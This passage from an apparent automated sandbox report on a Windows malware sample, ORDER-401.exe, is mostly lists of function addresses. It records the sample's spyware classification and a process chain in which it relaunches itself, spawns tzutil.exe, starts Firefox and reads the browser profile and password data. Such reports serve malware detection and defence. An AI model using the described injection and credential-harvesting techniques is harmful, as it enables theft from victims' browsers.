                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D81584_2_015D8158
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EA1184_2_015EA118
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015401004_2_01540100
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_016081CC4_2_016081CC
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_016101AA4_2_016101AA
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E20004_2_015E2000
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160A3524_2_0160A352
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_016103E64_2_016103E6
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155E3F04_2_0155E3F0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F02744_2_015F0274
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015D02C04_2_015D02C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015505354_2_01550535
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_016105914_2_01610591
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_016024464_2_01602446
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015FE4F64_2_015FE4F6
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015747504_2_01574750
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015507704_2_01550770
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154C7C04_2_0154C7C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156C6E04_2_0156C6E0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015669624_2_01566962
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0161A9A64_2_0161A9A6
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015529A04_2_015529A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015528404_2_01552840
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155A8404_2_0155A840
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0157E8F04_2_0157E8F0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015368B84_2_015368B8
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160AB404_2_0160AB40
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01606BD74_2_01606BD7
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154EA804_2_0154EA80
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015ECD1F4_2_015ECD1F
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155AD004_2_0155AD00
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0154ADE04_2_0154ADE0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01568DBF4_2_01568DBF
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550C004_2_01550C00
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01540CF24_2_01540CF2
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F0CB54_2_015F0CB5
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C4F404_2_015C4F40
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01570F304_2_01570F30
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F2F304_2_015F2F30
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01592F284_2_01592F28
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01542FC84_2_01542FC8
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155CFE04_2_0155CFE0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015CEFA04_2_015CEFA0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01550E594_2_01550E59
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160EE264_2_0160EE26
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160EEDB4_2_0160EEDB
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01562E904_2_01562E90
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160CE934_2_0160CE93
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0161B16B4_2_0161B16B
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153F1724_2_0153F172
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0158516C4_2_0158516C
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0155B1B04_2_0155B1B0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160F0E04_2_0160F0E0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_016070E94_2_016070E9
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015FF0CC4_2_015FF0CC
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015570C04_2_015570C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0153D34C4_2_0153D34C
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160132D4_2_0160132D
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0159739A4_2_0159739A
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156B2C04_2_0156B2C0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F12ED4_2_015F12ED
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015552A04_2_015552A0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_016075714_2_01607571
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015ED5B04_2_015ED5B0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015414604_2_01541460
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160F43F4_2_0160F43F
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160F7B04_2_0160F7B0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_016016CC4_2_016016CC
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015599504_2_01559950
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156B9504_2_0156B950
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015E59104_2_015E5910
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015BD8004_2_015BD800
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015538E04_2_015538E0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160FB764_2_0160FB76
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0158DBF94_2_0158DBF9
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C5BF04_2_015C5BF0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156FB804_2_0156FB80
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01607A464_2_01607A46
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160FA494_2_0160FA49
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C3A6C4_2_015C3A6C
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015FDAC64_2_015FDAC6
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015EDAAC4_2_015EDAAC
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01595AA04_2_01595AA0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015F1AA34_2_015F1AA3
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01607D734_2_01607D73
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01553D404_2_01553D40
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01601D5A4_2_01601D5A
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0156FDC04_2_0156FDC0
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_015C9C324_2_015C9C32
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160FCF24_2_0160FCF2
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160FF094_2_0160FF09
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01513FD24_2_01513FD2
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01513FD54_2_01513FD5
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01551F924_2_01551F92
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_0160FFB14_2_0160FFB1
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: 4_2_01559EB04_2_01559EB0
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeCode function: 7_2_04F20CD57_2_04F20CD5
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeCode function: 7_2_04F274607_2_04F27460
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeCode function: 7_2_04F274657_2_04F27465
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeCode function: 7_2_04F1EE457_2_04F1EE45
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeCode function: 7_2_04F1EE467_2_04F1EE46
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeCode function: 7_2_04F3F7B57_2_04F3F7B5
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeCode function: 7_2_04F20AB57_2_04F20AB5
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeCode function: 7_2_04F20AAD7_2_04F20AAD
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeCode function: 7_2_04F292487_2_04F29248
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325A3528_2_0325A352
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032603E68_2_032603E6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031AE3F08_2_031AE3F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032402748_2_03240274
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032202C08_2_032202C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031901008_2_03190100
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0323A1188_2_0323A118
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032281588_2_03228158
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032541A28_2_032541A2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032601AA8_2_032601AA
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032581CC8_2_032581CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032320008_2_03232000
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031C47508_2_031C4750
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A07708_2_031A0770
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0319C7C08_2_0319C7C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031BC6E08_2_031BC6E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A05358_2_031A0535
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032605918_2_03260591
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032444208_2_03244420
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032524468_2_03252446
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0324E4F68_2_0324E4F6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325AB408_2_0325AB40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03256BD78_2_03256BD7
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0319EA808_2_0319EA80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031B69628_2_031B6962
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0326A9A68_2_0326A9A6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A29A08_2_031A29A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A28408_2_031A2840
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031AA8408_2_031AA840
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031868B88_2_031868B8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031CE8F08_2_031CE8F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03242F308_2_03242F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031C0F308_2_031C0F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031E2F288_2_031E2F28
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03214F408_2_03214F40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0321EFA08_2_0321EFA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031ACFE08_2_031ACFE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325EE268_2_0325EE26
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A0E598_2_031A0E59
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031B2E908_2_031B2E90
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325CE938_2_0325CE93
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325EEDB8_2_0325EEDB
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031AAD008_2_031AAD00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0323CD1F8_2_0323CD1F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031B8DBF8_2_031B8DBF
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0319ADE08_2_0319ADE0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A0C008_2_031A0C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03240CB58_2_03240CB5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03190CF28_2_03190CF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325132D8_2_0325132D
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0318D34C8_2_0318D34C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031E739A8_2_031E739A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A52A08_2_031A52A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032412ED8_2_032412ED
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031BB2C08_2_031BB2C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0326B16B8_2_0326B16B
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0318F1728_2_0318F172
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031D516C8_2_031D516C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031AB1B08_2_031AB1B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325F0E08_2_0325F0E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032570E98_2_032570E9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A70C08_2_031A70C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0324F0CC8_2_0324F0CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325F7B08_2_0325F7B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031E56308_2_031E5630
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032516CC8_2_032516CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032575718_2_03257571
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0323D5B08_2_0323D5B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032695C38_2_032695C3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325F43F8_2_0325F43F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031914608_2_03191460
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325FB768_2_0325FB76
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031BFB808_2_031BFB80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03215BF08_2_03215BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031DDBF98_2_031DDBF9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03213A6C8_2_03213A6C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03257A468_2_03257A46
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325FA498_2_0325FA49
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03241AA38_2_03241AA3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0323DAAC8_2_0323DAAC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031E5AA08_2_031E5AA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0324DAC68_2_0324DAC6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_032359108_2_03235910
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A99508_2_031A9950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031BB9508_2_031BB950
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0320D8008_2_0320D800
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A38E08_2_031A38E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325FF098_2_0325FF09
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A1F928_2_031A1F92
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325FFB18_2_0325FFB1
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03163FD58_2_03163FD5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03163FD28_2_03163FD2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A9EB08_2_031A9EB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03257D738_2_03257D73
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031A3D408_2_031A3D40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03251D5A8_2_03251D5A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_031BFDC08_2_031BFDC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_03219C328_2_03219C32
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_0325FCF28_2_0325FCF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028C21308_2_028C2130
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028BB2908_2_028BB290
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028BD2708_2_028BD270
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028BB3E08_2_028BB3E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028BD0488_2_028BD048
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028BD0508_2_028BD050
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028C57F08_2_028C57F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028C3A008_2_028C3A00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028C39FB8_2_028C39FB
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_028DBD508_2_028DBD50
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02FDE4268_2_02FDE426
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02FDE5448_2_02FDE544
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02FDE8DC8_2_02FDE8DC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02FDD9A88_2_02FDD9A8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 8_2_02FDCC488_2_02FDCC48
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: String function: 01597E54 appears 101 times
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: String function: 015CF290 appears 105 times
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: String function: 015BEA12 appears 86 times
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: String function: 0153B970 appears 275 times
                Source: C:\Users\user\Desktop\ORDER-401.exeCode function: String function: 01585130 appears 58 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 0318B970 appears 280 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 0321F290 appears 105 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 0320EA12 appears 86 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 031E7E54 appears 111 times
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: String function: 031D5130 appears 58 times
                Source: ORDER-401.exe, 00000000.00000002.1586921337.0000000005F70000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs ORDER-401.exe
                Source: ORDER-401.exe, 00000000.00000002.1587843187.0000000007240000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs ORDER-401.exe
                Source: ORDER-401.exe, 00000000.00000002.1571758996.0000000000DCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ORDER-401.exe
                Source: ORDER-401.exe, 00000000.00000000.1394002348.00000000008C2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamexlzBH.exeL vs ORDER-401.exe
                Source: ORDER-401.exe, 00000000.00000002.1573736066.0000000002C58000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs ORDER-401.exe
                Source: ORDER-401.exe, 00000004.00000002.2097212523.000000000163D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ORDER-401.exe
                Source: ORDER-401.exe, 00000004.00000002.2096889491.0000000000F87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametzutil.exej% vs ORDER-401.exe
                Source: ORDER-401.exe, 00000004.00000002.2096889491.0000000000F68000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametzutil.exej% vs ORDER-401.exe
                Source: ORDER-401.exeBinary or memory string: OriginalFilenamexlzBH.exeL vs ORDER-401.exe
                Source: ORDER-401.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: ORDER-401.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, YRDVta5gJ5ilAYX9J5.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, YRDVta5gJ5ilAYX9J5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, YRDVta5gJ5ilAYX9J5.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, YRDVta5gJ5ilAYX9J5.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, YRDVta5gJ5ilAYX9J5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, YRDVta5gJ5ilAYX9J5.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.ORDER-401.exe.7240000.4.raw.unpack, q7rgpHp9dHf1607YWr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.ORDER-401.exe.3cc68a8.0.raw.unpack, q7rgpHp9dHf1607YWr.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@11/6
                Source: C:\Users\user\Desktop\ORDER-401.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ORDER-401.exe.logJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\tzutil.exeFile created: C:\Users\user\AppData\Local\Temp\UQ63g7r-Jump to behavior
                Source: ORDER-401.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ORDER-401.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: tzutil.exe, 00000008.00000002.3255491198.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2287243226.0000000002BF6000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2287384131.0000000002C17000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000002.3255491198.0000000002C43000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000008.00000003.2289828066.0000000002C21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ORDER-401.exeReversingLabs: Detection: 68%
                Source: unknownProcess created: C:\Users\user\Desktop\ORDER-401.exe "C:\Users\user\Desktop\ORDER-401.exe"
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess created: C:\Users\user\Desktop\ORDER-401.exe "C:\Users\user\Desktop\ORDER-401.exe"
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\ORDER-401.exeProcess created: C:\Users\user\Desktop\ORDER-401.exe "C:\Users\user\Desktop\ORDER-401.exe"Jump to behavior
                Source: C:\Program Files (x86)\mFcuZnbhgXdemrXcBnUPFhsumXtyIJrpCtNGIfFsGFULpnbNNjwgjyZOXqPERImEnscPjlDbvuZ\PcwrDoOfOMD.exeProcess created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ORDER-401.exeSection loaded: mscoree.dllJump to behavior
